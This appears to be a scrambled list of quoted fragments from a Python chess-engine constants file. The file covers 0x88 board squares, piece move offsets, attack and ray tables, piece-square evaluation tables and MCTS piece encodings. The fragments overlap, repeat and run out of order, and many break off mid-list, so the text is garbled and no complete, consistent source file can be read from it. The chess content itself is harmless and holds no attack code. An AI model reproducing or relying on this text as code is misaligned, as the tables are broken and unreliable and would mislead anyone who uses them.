0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0, 0,", "ROOK = 'r' QUEEN = 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION", "1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5,", "0, 0, 0,20, 0, 0, 0, 0, 20,0, 0, 0, 0, 0, 24,", "1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0],", "0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5],", "-3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 16, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0,", "48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5': 54,", "69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83,", "0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0,", "-0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5,", "20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34,", "-2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5,", "[-17, -16, -15, 1, 17, 16, 15, -1], 'k': [-17, -16, -15, 1,", "0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 17, 0, 16, 0, 15, 0, 0, 0,", "'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] #", "0, 24, 0, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0,", "24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, -1, -1,", "-15, 0, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0, 0,-17", "} # Directions different pieces can move PIECE_OFFSETS = { 'n': [-18, -33,", "0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0, 0,", "'d1': 115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119 } ROOKS =", "{'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0,", "-3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0,", "35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49,", "0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0, 0, 0,20,", "0,20, 0, 0, 0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0,", "-2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0,", "1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0],", "-1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL =", "0, 0,-17, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0, 0,-16, 0,", "'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6':", "-2.0] ] ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "MCTS_DECODER = { 1 : 'p', 2 : 'n', 3 : 'b', 4", "[-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0,", "= { 1 : 'p', 2 : 'n', 3 : 'b', 4 :", "= { 'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8':", "= { 'p': 0, 'n': 1, 'b': 2, 'r': 3, 'q': 4, 'k':", "RANK_1 = 7 RANK_2 = 6 RANK_3 = 5 RANK_4 = 4 RANK_5", "'g1': 118, 'h1': 119 } ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']},", "0,20 ] RAYS = [ 17, 0, 0, 0, 0, 0, 0, 16,", "ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b':", "{ 'w' : 1, 'b' : -1 } ATTACKS = [ 20,0, 0,", "= [ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0,", "'0-1', '1/2-1/2', '*'] # Directions pawns can move: forward 1, forward 2, right", "0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 20,0, 0, 0,", "= 'b' ROOK = 'r' QUEEN = 'q' KING = 'k' SYMBOLS =", "[-16, 1, 16, -1], 'q': [-17, -16, -15, 1, 17, 16, 15, -1],", "103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117,", "'k' } MCTS_COLOR_MAP = { 'w' : 1, 'b' : -1 } ATTACKS", "5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0,", "-1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5,", "-0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0,", "[-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0,", "1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0,", "RANK_2 = 6 RANK_3 = 5 RANK_4 = 4 RANK_5 = 3 RANK_6", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24,", "0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20, 0, 0, 20,0,", "0, 0, 0, 0,20, 0, 0, 0, 0, 0, 0,20, 0, 0, 0,", "-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5,", "0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0,", "# BOARD CONSTANTS ####################################################### BLACK = 'b' WHITE = 'w' EMPTY = -1", "1, 'b': 2, 'r': 3, 'q': 4, 'k': 5 } FLAGS = {", "0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15,", "'d8': 3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7':", "'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2':", "53, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20,", "RANK_3 = 5 RANK_4 = 4 RANK_5 = 3 RANK_6 = 2 RANK_7", "'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL':", "0, 0, 16, 0, 0, 0, 0, 0, 0, 15, 0, 0, 17,", "0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [ [ -2.0, -1.0,", "0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 0, 24, 0, 0,", "1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [", "'k' : 6, } MCTS_DECODER = { 1 : 'p', 2 : 'n',", "0, 0, 0, 0, 0, 0,20 ] RAYS = [ 17, 0, 0,", "0, 17, 0, 0, 16, 0, 0, 15, 0, 0, 0, 0, 0,", "'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5':", "'w' EMPTY = -1 PAWN = 'p' KNIGHT = 'n' BISHOP = 'b'", "1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7,", "2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0,", "0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0,", "1, 1, 1, 1, 1, 0, -1, -1, -1,-1, -1, -1, -1, 0,", "16, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2,", "'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN':", ": 2, 'b' : 3, 'r' : 4, 'q' : 5, 'k' :", "0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5,", "[-17, -16, -15, 1, 17, 16, 15, -1] } MCTS_MAPPING = { 'p'", "2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0,", "-1], 'k': [-17, -16, -15, 1, 17, 16, 15, -1] } MCTS_MAPPING =", "ATTACKS = [ 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0,", "0, 17, 16, 15, 0, 0, 0, 0, 0, 0, 0, 1, 1,", "'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 = 6 RANK_3 = 5 RANK_4", "0, 0, 0, 0, 0,-15, 0, 0, 0, 0,-16, 0, 0, 0, 0,-17,", "0, 0, 0, 0, 17, 0, 16, 0, 15, 0, 0, 0, 0,", "16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7': 22,", "0,-17, 0, 0, 0, 0,-15, 0, 0, 0, 0, 0,-16, 0, 0, 0,", "0, 15, 0, 0, 0, 0, 17, 0, 0, 0, 0, 16, 0,", "0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can move: forward", "1 RANK_8 = 0 SQUARES = { 'a8': 0, 'b8': 1, 'c8': 2,", "3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17,", "50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64,", "0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0,", "-2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0],", "0, 16, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0,", "1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0],", "0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 20,0, 0,", "-1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "-3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0,", "1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],", "0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,53, 56,", "0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0, 0, 0, 0,", "0, 0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 0,", "0, 0, 17, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0,", "16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 = 6 RANK_3", "0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0,", "'d7': 19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6':", "2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5,", "BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag':", "0, 0, 0, 0, 0, 0,-15, 0, 0, 0, 0,-16, 0, 0, 0,", "-0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0,", "[ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0,", "[ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0,", "0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0,", "-1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0,", "-4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0,", "-4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0,", "5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e',", "0, 0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56,", "0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20, 0,", "68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82,", "0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, -1,", "0, 0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 20,", "0, 0, 0,-17, 0, 0, 0, 0,-15, 0, 0, 0, 0, 0,-16, 0,", "-1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5,", ": 1, 'b' : -1 } ATTACKS = [ 20,0, 0, 0, 0,", "0, -15, 0, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0,", "-3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0,", "0 SQUARES = { 'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8':", "0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5,", "BISHOP = 'b' ROOK = 'r' QUEEN = 'q' KING = 'k' SYMBOLS", "RANK_5 = 3 RANK_6 = 2 RANK_7 = 1 RANK_8 = 0 SQUARES", "move PIECE_OFFSETS = { 'n': [-18, -33, -31, -14, 18, 33, 31, 14],", "'*'] # Directions pawns can move: forward 1, forward 2, right (capture), left", "0, 0, 0, 0,-17, 0, 0, -15, 0, 0, 0, 0, 0, 0,-16,", "'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1':", "'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE':", "-5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0,", "'q' } BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8,", "0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ]", "0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0,", "-2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0,", "'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3':", "1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0,", "0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL", "0, 0, 0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0,", "2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24,", "0, 0, 0, 0,20 ] RAYS = [ 17, 0, 0, 0, 0,", "0, 0, 0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0, 0, 0,", "(capture), left (capture) PAWN_OFFSETS = { 'b': [16, 32, 17, 15], 'w': [-16,", "= 'n' BISHOP = 'b' ROOK = 'r' QUEEN = 'q' KING =", "0, 0, 15, 0, 0, 17, 0, 0, 0, 0, 0, 16, 0,", "= 0 SQUARES = { 'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3,", "0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [", "0, 0, 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0,", "0, 0, 16, 0, 0, 0, 0, 0, 15, 0, 0, 0, 0,", "0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5],", "[ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0,", "0,-15, 0, 0, 0, 0,-16, 0, 0, 0, 0,-17, 0, 0, 0, 0,-15,", "2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5,", "0, 0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,", "-1.0, -1.0, -2.0] ] ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0, 0.0,", "'r' : 4, 'q' : 5, 'k' : 6, } MCTS_DECODER = {", "- 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can", "0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0,", "0, 0, 0, 0, 0, 0, 15, 0, 0, 17, 0, 0, 0,", "0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL", "0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5,", "16, 0, 0, 0, 0, 0, 15, 0, 0, 0, 0, 17, 0,", "0, 0, 0, 0,-15, 0, 0, 0, 0,-16, 0, 0, 0, 0,-17, 0,", "-1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [ [ 0.0,", "1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [", "0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5],", "1, 'n' : 2, 'b' : 3, 'r' : 4, 'q' : 5,", "} MCTS_DECODER = { 1 : 'p', 2 : 'n', 3 : 'b',", "0, 0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 0,", "0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0,", "= [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0,", "= 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*']", "0, 0,20, 0, 0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0,", "-1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0,", "-1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0,", "} ATTACKS = [ 20,0, 0, 0, 0, 0, 0, 24, 0, 0,", "'r': 3, 'q': 4, 'k': 5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE':", "[ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0,", "'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8':", "BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16,", "[-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0,", "-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0,", "0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 0, 0,", "[ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0,", "-1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0,", "-4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [", "15, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 16,", "DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2',", "24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20,", "2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0,", "32, 17, 15], 'w': [-16, -32, -17, -15] } # Directions different pieces", "0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0,", "'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3':", "0, 0,20, 2, 24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 17, 0, 0, 0, 0, 16, 0, 0, 0,", "-1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0,", "] ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],", "0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0,", "0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can move:", "-1, -1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0,", "0, 0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0, 0,", "24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2,", "'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4':", "-3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0,", "-2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]", "'d2': 99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1':", "[16, 32, 17, 15], 'w': [-16, -32, -17, -15] } # Directions different", "0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0,", ": 'q', 6 : 'k' } MCTS_COLOR_MAP = { 'w' : 1, 'b'", "5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0,", "[-16, -32, -17, -15] } # Directions different pieces can move PIECE_OFFSETS =", "2, 'b' : 3, 'r' : 4, 'q' : 5, 'k' : 6,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2, 24, 2,20,", "0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 16, 0, 0,", "-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0,", "{ 'b': [16, 32, 17, 15], 'w': [-16, -32, -17, -15] } #", "0, 17, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0,", "17, 15], 'w': [-16, -32, -17, -15] } # Directions different pieces can", "= [ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0,", "55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69,", "0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0,", "2, right (capture), left (capture) PAWN_OFFSETS = { 'b': [16, 32, 17, 15],", "different pieces can move PIECE_OFFSETS = { 'n': [-18, -33, -31, -14, 18,", "0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 0, 24, 0,", "0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0,", "2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0,", "0, 0, 0,-16, 0, 0, 0,-17, 0, 0, 0, 0, 0, 0,-15, 0,", "'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6':", "0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5,", "0,20, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0, 0,", "0, 0, 0, 0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0,", "0, 20, 0, 0, 0, 0, 24, 0, 0, 0, 0,20, 0, 0,", "SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS =", "20, 0, 0, 0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0, 0, 0,", "17, 0, 0, 0, 16, 0, 0, 0, 15, 0, 0, 0, 0,", "0, 17, 0, 0, 0, 16, 0, 0, 0, 15, 0, 0, 0,", "0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20 ]", "0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 15, 0, 0,", "0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0,", "-3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5,", "[-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0,", "15, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 16, 0,", "] ] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0,", "BLACK = 'b' WHITE = 'w' EMPTY = -1 PAWN = 'p' KNIGHT", "-1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0,", "'n': [-18, -33, -31, -14, 18, 33, 31, 14], 'b': [-17, -15, 17,", "0, 0, 0, 17, 0, 0, 16, 0, 0, 15, 0, 0, 0,", "####################################################### # BOARD CONSTANTS ####################################################### BLACK = 'b' WHITE = 'w' EMPTY =", "0, 0, 16, 0, 0, 0, 0, 15, 0, 0, 0, 0, 0,", "0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0,", "64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4': 70,", "0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0],", "0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15,", "0, 17, 0, 0, 0, 0, 16, 0, 0, 0, 0, 15, 0,", "116, 'f1': 117, 'g1': 118, 'h1': 119 } ROOKS = { 'w': [{'square':", "[ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0,", "0.0, -1.0], [ -1.0, 0.0, 